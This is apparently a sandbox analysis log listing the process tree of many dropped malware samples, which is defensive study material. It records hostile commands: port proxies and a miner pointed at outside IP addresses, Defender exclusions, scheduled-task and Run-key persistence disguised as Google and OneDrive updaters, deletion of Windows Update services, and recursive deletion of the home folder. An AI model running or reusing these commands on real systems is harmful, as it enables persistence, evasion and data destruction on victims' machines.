"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\puomtcet.cmdline"
3⤵
PID:1036

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES37CD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC37CC.tmp"
4⤵
PID:3764

C:\Windows\system32\chcp.com
"C:\Windows\system32\chcp.com" 437
3⤵
PID:6820

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:2080

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
3⤵
- Gathers network information
PID:7044

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
3⤵
- Gathers network information
PID:6048

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy reset
3⤵
PID:6512

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
3⤵
- Gathers network information
PID:6936

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:5116

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=5.133.65.53
3⤵
PID:5228

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:7092

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:1876

C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe
"C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe" -o 5.133.65.54:80 --tls --http-port 888 -t 1
3⤵
PID:6804

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:768

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
3⤵
- Gathers network information
PID:6044

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
3⤵
- Gathers network information
PID:5820

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
3⤵
- Gathers network information
PID:5236

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:4828

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=703 connectport=80 connectaddress=5.133.65.54
3⤵
PID:4156

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:3736

C:\Users\Admin\AppData\Local\Temp\Files\RMS.exe
"C:\Users\Admin\AppData\Local\Temp\Files\RMS.exe"
3⤵
PID:5192

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe" /rsetup
4⤵
PID:1652

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi" /qn
5⤵
PID:4948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\killself.bat
5⤵
PID:3880

C:\Users\Admin\AppData\Local\Temp\Files\1701788303-crptmnr.exe
"C:\Users\Admin\AppData\Local\Temp\Files\1701788303-crptmnr.exe"
2⤵
PID:3044

C:\Users\Admin\AppData\Local\Temp\Files\1701788303-crptmnr.exe
C:\Users\Admin\AppData\Local\Temp\Files\1701788303-crptmnr.exe
3⤵
PID:5548

C:\Users\Admin\AppData\Local\Temp\Files\kb%5Efr_ouverture.exe
"C:\Users\Admin\AppData\Local\Temp\Files\kb%5Efr_ouverture.exe"
2⤵
PID:5880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5880 -s 724
3⤵
- Program crash
PID:5828

C:\Users\Admin\AppData\Local\Temp\Files\659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe"
2⤵
PID:6876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 372
3⤵
- Program crash
PID:7112

C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
2⤵
PID:2296

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:6252

C:\Users\Admin\AppData\Local\Temp\Files\Aztec.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Aztec.exe"
2⤵
PID:3652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
3⤵
PID:1612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
3⤵
PID:4660

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
PID:7056

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
PID:6920

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
PID:5160

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
PID:5352

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
PID:5076

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:5452

C:\Windows\System32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:6480

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1280

C:\Windows\System32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:948

C:\Windows\System32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:5156

C:\Windows\System32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:2992

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
4⤵
PID:6068

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
4⤵
PID:5548

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
4⤵
PID:1852

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
4⤵
PID:2044

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
PID:4448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#extmbyk#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
3⤵
PID:556

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
4⤵
PID:2192

C:\Users\Admin\AppData\Local\Temp\Files\ww.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ww.exe"
2⤵
PID:3728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3728 -s 556
3⤵
- Program crash
PID:1060

C:\Users\Admin\AppData\Local\Temp\Files\Doublepulsar-1.3.1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Doublepulsar-1.3.1.exe"
2⤵
PID:5868

C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe"
2⤵
PID:1096

C:\Users\Admin\AppData\Local\Temp\Files\6.exe
"C:\Users\Admin\AppData\Local\Temp\Files\6.exe"
2⤵
PID:3276

C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe
"C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe"
2⤵
PID:2408

C:\Users\Admin\AppData\Local\Temp\2908817870.exe
C:\Users\Admin\AppData\Local\Temp\2908817870.exe
3⤵
PID:2516

C:\Windows\sysplorsv.exe
C:\Windows\sysplorsv.exe
4⤵
PID:5576

C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe
"C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe"
2⤵
PID:5104

C:\Users\Admin\AppData\Local\Temp\Files\adobe.exe
"C:\Users\Admin\AppData\Local\Temp\Files\adobe.exe"
2⤵
PID:6816

C:\Users\Admin\AppData\Local\Temp\is-C0PDJ.tmp\adobe.tmp
"C:\Users\Admin\AppData\Local\Temp\is-C0PDJ.tmp\adobe.tmp" /SL5="$5044C,6762740,54272,C:\Users\Admin\AppData\Local\Temp\Files\adobe.exe"
3⤵
PID:6764

C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe"
2⤵
PID:6596

C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe
"C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe"
2⤵
PID:6660

C:\Users\Admin\AppData\Local\Temp\Files\Voiceaibeta-5.13.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Voiceaibeta-5.13.exe"
2⤵
PID:404

C:\Users\Admin\AppData\Local\Temp\Files\Voiceaibeta-5.13.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Voiceaibeta-5.13.exe"
3⤵
PID:4480

C:\Users\Admin\AppData\Local\Temp\Files\tuc7.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tuc7.exe"
2⤵
PID:4784

C:\Users\Admin\AppData\Local\Temp\is-U3DJ7.tmp\tuc7.tmp
"C:\Users\Admin\AppData\Local\Temp\is-U3DJ7.tmp\tuc7.tmp" /SL5="$301B6,6813047,54272,C:\Users\Admin\AppData\Local\Temp\Files\tuc7.exe"
3⤵
PID:4044

C:\Users\Admin\AppData\Local\Temp\Files\Project_8.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Project_8.exe"
2⤵
PID:1248

C:\Users\Admin\AppData\Local\Temp\648b5vt13485v134322685vt.exe
"C:\Users\Admin\AppData\Local\Temp\648b5vt13485v134322685vt.exe"
3⤵
PID:4488

C:\Users\Admin\AppData\Local\Temp\Files\pp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"
2⤵
PID:6376

C:\Users\Admin\AppData\Local\Temp\229427034.exe
C:\Users\Admin\AppData\Local\Temp\229427034.exe
3⤵
PID:5460

C:\Users\Admin\AppData\Local\Temp\Files\Dvvyjoogg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Dvvyjoogg.exe"
2⤵
PID:5528

C:\Users\Admin\AppData\Local\Temp\Files\%E5%8F%91%E7%A5%A8%E7%94%B5%E8%84%91%E7%89%88-%E6%9C%8D%E5%8A%A1%E7%AB%AF_sos.exe
"C:\Users\Admin\AppData\Local\Temp\Files\%E5%8F%91%E7%A5%A8%E7%94%B5%E8%84%91%E7%89%88-%E6%9C%8D%E5%8A%A1%E7%AB%AF_sos.exe"
2⤵
PID:5628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1280
3⤵
- Program crash
PID:7016

C:\Users\Admin\AppData\Local\Temp\Files\pei.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"
2⤵
PID:5856

C:\Users\Admin\AppData\Local\Temp\3197720290.exe
C:\Users\Admin\AppData\Local\Temp\3197720290.exe
3⤵
PID:244

C:\Users\Admin\AppData\Local\Temp\Files\26a53caa59be5c918cfee530cd39363f8a409033d6c8af51d8f8900aa67acf9a.exe
"C:\Users\Admin\AppData\Local\Temp\Files\26a53caa59be5c918cfee530cd39363f8a409033d6c8af51d8f8900aa67acf9a.exe"
2⤵
PID:5660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5660 -s 372
3⤵
- Program crash
PID:3784

C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
2⤵
PID:4704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5B56.tmp.bat""
3⤵
PID:6316

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:5832

C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe
"C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
4⤵
PID:4900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
5⤵
PID:4888

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
6⤵
- DcRat
- Creates scheduled task(s)
PID:6284

C:\Users\Admin\AppData\Local\Temp\Files\c64.exe
"C:\Users\Admin\AppData\Local\Temp\Files\c64.exe"
2⤵
PID:5744

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\Files\c64.exe" > nul
3⤵
PID:3716

C:\Users\Admin\AppData\Local\Temp\Files\pdf.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pdf.exe"
2⤵
PID:1084

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:6540

C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
2⤵
PID:3584

C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
3⤵
PID:2168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
4⤵
PID:5912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
4⤵
PID:6588

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:2640

C:\Users\Admin\AppData\Local\Temp\Files\RobluxCoins.exe
"C:\Users\Admin\AppData\Local\Temp\Files\RobluxCoins.exe"
2⤵
PID:6276

C:\Windows\SYSTEM32\WerFault.exe
WerFault
3⤵
PID:2420

C:\Users\Admin\AppData\Local\Temp\Files\notepad.exe
"C:\Users\Admin\AppData\Local\Temp\Files\notepad.exe"
2⤵
PID:3764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-Item $HOME -Recurse
3⤵
PID:5952

C:\Users\Admin\AppData\Local\Temp\Files\lve.exe
"C:\Users\Admin\AppData\Local\Temp\Files\lve.exe"
2⤵
PID:4664

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rundll32.exe
3⤵
- Kills process with taskkill
PID:6096

C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"
2⤵
PID:6908

C:\Users\Admin\AppData\Local\Temp\is-2R4O9.tmp\tuc2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2R4O9.tmp\tuc2.tmp" /SL5="$600E8,6573957,54272,C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"
3⤵
PID:1536

C:\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe
"C:\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe"
2⤵
PID:6180

C:\Users\Admin\AppData\Local\Temp\is-DNE6R.tmp\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DNE6R.tmp\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.tmp" /SL5="$104D2,1495449,832512,C:\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe"
3⤵
PID:5324

C:\Users\Admin\AppData\Local\Temp\Files\update.exe
"C:\Users\Admin\AppData\Local\Temp\Files\update.exe"
2⤵
PID:1116

C:\Users\Admin\AppData\Local\Temp\Files\15c63318bd5a529e599e5d60302f2dc14961ebcc209b735796efbfdb4c1d59fd.exe
"C:\Users\Admin\AppData\Local\Temp\Files\15c63318bd5a529e599e5d60302f2dc14961ebcc209b735796efbfdb4c1d59fd.exe"
2⤵
PID:556

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\1.vbs"
3⤵
PID:5960

C:\Windows\Temp\tel.exe
"C:\Windows\Temp\tel.exe"
3⤵
PID:2192

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
4⤵
PID:3732

C:\Windows\Temp\jjj.exe
"C:\Windows\Temp\jjj.exe"
3⤵
PID:3576

C:\Windows\Temp\fcc.exe
"C:\Windows\Temp\fcc.exe"
3⤵
PID:1008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\bebra.exe\bebra.exe
4⤵
PID:6716

C:\Users\Admin\AppData\Local\Temp\Files\360TS_Setup_Mini_WW.Marketator.CPI20230401_6.6.0.1054.exe
"C:\Users\Admin\AppData\Local\Temp\Files\360TS_Setup_Mini_WW.Marketator.CPI20230401_6.6.0.1054.exe"
2⤵
PID:6640

C:\Users\Admin\AppData\Local\Temp\Files\socks5-clean.exe
"C:\Users\Admin\AppData\Local\Temp\Files\socks5-clean.exe"
2⤵
PID:5872

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2824

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
PID:2788

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
PID:1420

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
PID:5864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 22
1⤵
PID:1092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4068 -ip 4068
1⤵
PID:1876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8802.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:5016

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
2⤵
PID:2612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\896B.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:3468

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
2⤵
PID:4924

C:\Users\Admin\AppData\Local\Temp\B3F6.exe
C:\Users\Admin\AppData\Local\Temp\B3F6.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4684

C:\Users\Admin\AppData\Local\Temp\B3F6.exe
C:\Users\Admin\AppData\Local\Temp\B3F6.exe
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1160

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\8e6dd4f5-e1d7-4761-85cc-336fccaa8b6b" /deny *S-1-1-0:(OI)(CI)(DE,DC)
3⤵
- Modifies file permissions
PID:2232

C:\Users\Admin\AppData\Local\Temp\B3F6.exe
"C:\Users\Admin\AppData\Local\Temp\B3F6.exe" --Admin IsNotAutoStart IsNotTask
3⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\B3F6.exe
"C:\Users\Admin\AppData\Local\Temp\B3F6.exe" --Admin IsNotAutoStart IsNotTask
4⤵
PID:776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 620
5⤵
- Program crash
PID:1872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 4068 -ip 4068
1⤵
PID:2080

C:\Users\Admin\AppData\Local\Temp\E393.exe
C:\Users\Admin\AppData\Local\Temp\E393.exe
1⤵
PID:3472

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
2⤵
PID:2040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2040 -s 764
3⤵
- Program crash
PID:4484

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
2⤵
PID:4344

C:\Users\Admin\AppData\Local\Temp\EF9A.exe
C:\Users\Admin\AppData\Local\Temp\EF9A.exe
1⤵
- Executes dropped EXE
PID:3160

C:\Users\Admin\AppData\Roaming\configurationValue\ytlogsbot.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\ytlogsbot.exe"
2⤵
- Executes dropped EXE
PID:2840

C:\Users\Admin\AppData\Roaming\configurationValue\UNION.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\UNION.exe"
2⤵
- Executes dropped EXE
PID:3768

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "EF9A.exe"
2⤵
PID:3272

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:1588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3972 -ip 3972
1⤵
PID:4068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3972 -ip 3972
1⤵
PID:4264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2040 -ip 2040
1⤵
PID:2948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABTAHQAcgBpAG4AZwBJAGQAcwAuAGUAeABlADsA
1⤵
PID:1328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 776 -ip 776
1⤵
PID:4680

C:\Users\Admin\AppData\Local\Temp\B59B.exe
C:\Users\Admin\AppData\Local\Temp\B59B.exe
1⤵
PID:2172

C:\Users\Admin\AppData\Local\Temp\onefile_2172_133477087281123790\stub.exe
C:\Users\Admin\AppData\Local\Temp\B59B.exe
2⤵
PID:3056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
3⤵
PID:4256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
3⤵
PID:2808

C:\Windows\system32\tasklist.exe
tasklist
4⤵
- Enumerates processes with tasklist
PID:3284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
3⤵
PID:404

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
PID:1096

C:\Users\Admin\AppData\Local\Temp\C5A9.exe
C:\Users\Admin\AppData\Local\Temp\C5A9.exe
1⤵
PID:2612

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\AY6tJ44.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\AY6tJ44.exe
2⤵
PID:772

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\DC6Zf99.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\DC6Zf99.exe
3⤵
PID:3492

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Es04KB7.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Es04KB7.exe
4⤵
PID:4916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
5⤵
PID:4984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ffd08823cb8,0x7ffd08823cc8,0x7ffd08823cd8
6⤵
PID:3828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1976 /prefetch:2
6⤵
PID:3532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2648 /prefetch:8
6⤵
PID:5712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
6⤵
PID:5684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
